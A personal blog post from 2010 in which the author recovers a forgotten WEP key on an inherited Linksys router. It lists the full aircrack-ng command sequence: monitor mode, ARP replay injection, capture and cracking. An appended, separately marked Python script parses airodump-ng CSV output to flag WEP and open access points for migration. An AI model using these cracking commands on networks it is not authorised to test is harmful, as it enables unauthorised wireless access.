From the Canyon Edge -- :-Dustin

Tuesday, November 30, 2010

These aren't the droids you're looking for

I recently inherited a disused Linksys wireless router. The previous owner had long since forgotten the WEP passphrase (although he still had embedded devices around the house that were connected to the WAP). Of course, it's trivial to reset a Linksys router back to the factory defaults, which I would use eventually. But before I did that, I thought I would try something else first.

Having never tried to crack a WEP key before, I thought this would be a nice opportunity to learn how. There are plenty of excellent, detailed tutorials out there. And this blog post isn't one of them.

It's merely a "note to self" -- what worked for me at this point in time. So if you're looking for a detailed explanation of the process or perhaps support in your quest, "These aren't the droids you're looking for. Move along, move along."

First, I created a directory to store the captured packets.
DIR=$(mktemp -d)
cd "$DIR"
I then installed the utilities from the 10.10 archive.
sudo apt-get install aircrack-ng
Next, I checked my interface.
sudo airmon-ng check wlan0
And I stopped any services using wlan0 (avahi-daemon, NetworkManager, wpa_supplicant). Then I started monitor mode on the interface, which creates a separate monitor interface, mon0, that the remaining commands use.
sudo airmon-ng start wlan0
Now, I needed to scan the airwaves, looking for my access point.
sudo airodump-ng mon0
When I recognized the ESSID I was looking for, I noted its BSSID and channel number (referred to below as $bssid and $channel). Then, I started replaying ARP requests on the monitor interface.
sudo aireplay-ng -3 -b $bssid -h 00:00:00:00:00:00 mon0
I let this run for a while in one window. At the same time, I started capturing replies in another window, again on the monitor interface, writing the capture files with the prefix "dump".
sudo airodump-ng --channel $channel --bssid $bssid --write dump mon0
And in a third window, I started analyzing the captured data, looking for the key.
sudo aircrack-ng dump-*.cap
It took about 7,500 ARP requests and IVs (initialization vectors) gathered over about 2 hours to divine the key, but it worked eventually, like a charm!
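The same airodump-ng capture is also useful from the defender's side: the "--write dump" run above produces a dump-01.csv listing every access point seen, including its Privacy column, so an administrator can scan it for legacy WEP (or open) networks that still need to be migrated to WPA2/WPA3. The script below is an added example, not code from the original post; it assumes the column layout that airodump-ng writes to its CSV (BSSID, First time seen, ..., Privacy, ..., # IV, ..., ESSID, Key), and the sample file contents are constructed, not a real capture.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to dump-01.csv:
# an access-point table, a blank line, then a station table.
# (Column order is an assumption; check it against your own capture.)
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-11-30 20:01:02, 2010-11-30 20:45:10,  6,  54, WEP , WEP, OPN, -40,  1200,  7500,   0.  0.  0.  0,   7, linksys, 
66:77:88:99:AA:BB, 2010-11-30 20:01:05, 2010-11-30 20:45:11, 11,  54, WPA2, CCMP, PSK, -55,   900,     0,   0.  0.  0.  0,   9, homewifi2, 
CC:DD:EE:FF:00:11, 2010-11-30 20:02:00, 2010-11-30 20:44:00,  1,  54, OPN ,    ,    , -70,   300,     0,   0.  0.  0.  0,   6, coffee, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2010-11-30 20:01:10, 2010-11-30 20:45:00, -50,   450, 00:11:22:33:44:55, linksys
"""


def parse_access_points(text):
    """Return the access-point section of an airodump-ng CSV as a list of dicts.

    Rows are keyed by the header names; parsing stops at the blank line that
    separates the AP table from the station table.
    """
    aps = []
    header = None
    reader = csv.reader(io.StringIO(text), skipinitialspace=True)
    for row in reader:
        row = [cell.strip() for cell in row]
        if not any(row):
            if header is not None:
                break  # end of the AP table
            continue  # leading blank line before the header
        if row[0] == "BSSID":
            header = row
            continue
        if header is None:
            continue  # ignore anything before the AP header
        aps.append(dict(zip(header, row)))
    return aps


def weak_access_points(aps):
    """Flag APs whose Privacy setting is WEP or OPN (no encryption).

    Returns (bssid, essid, reason) tuples. The '# IV' count is included for
    WEP networks because that is the quantity an attacker accumulates.
    """
    findings = []
    for ap in aps:
        privacy = ap.get("Privacy", "").split()  # may list several, e.g. "WPA2 WPA"
        if "WEP" in privacy:
            reason = ("WEP: key recoverable from captured IVs (%s seen); "
                      "migrate to WPA2/WPA3" % ap.get("# IV", "?"))
            findings.append((ap["BSSID"], ap["ESSID"], reason))
        elif "OPN" in privacy:
            findings.append((ap["BSSID"], ap["ESSID"],
                             "open network: traffic is unencrypted"))
    return findings


def audit(text):
    """Parse a CSV and return the list of weak access points."""
    return weak_access_points(parse_access_points(text))


if __name__ == "__main__":
    # Run against a real file with: audit(open("dump-01.csv").read())
    for bssid, essid, reason in audit(SAMPLE_CSV):
        print("%s  %-12s %s" % (bssid, essid, reason))
```

Run it against the dump-01.csv from your own airodump-ng session to get a short list of BSSIDs that should be reconfigured; the WPA2/CCMP entry in the constructed sample is correctly left out of the findings.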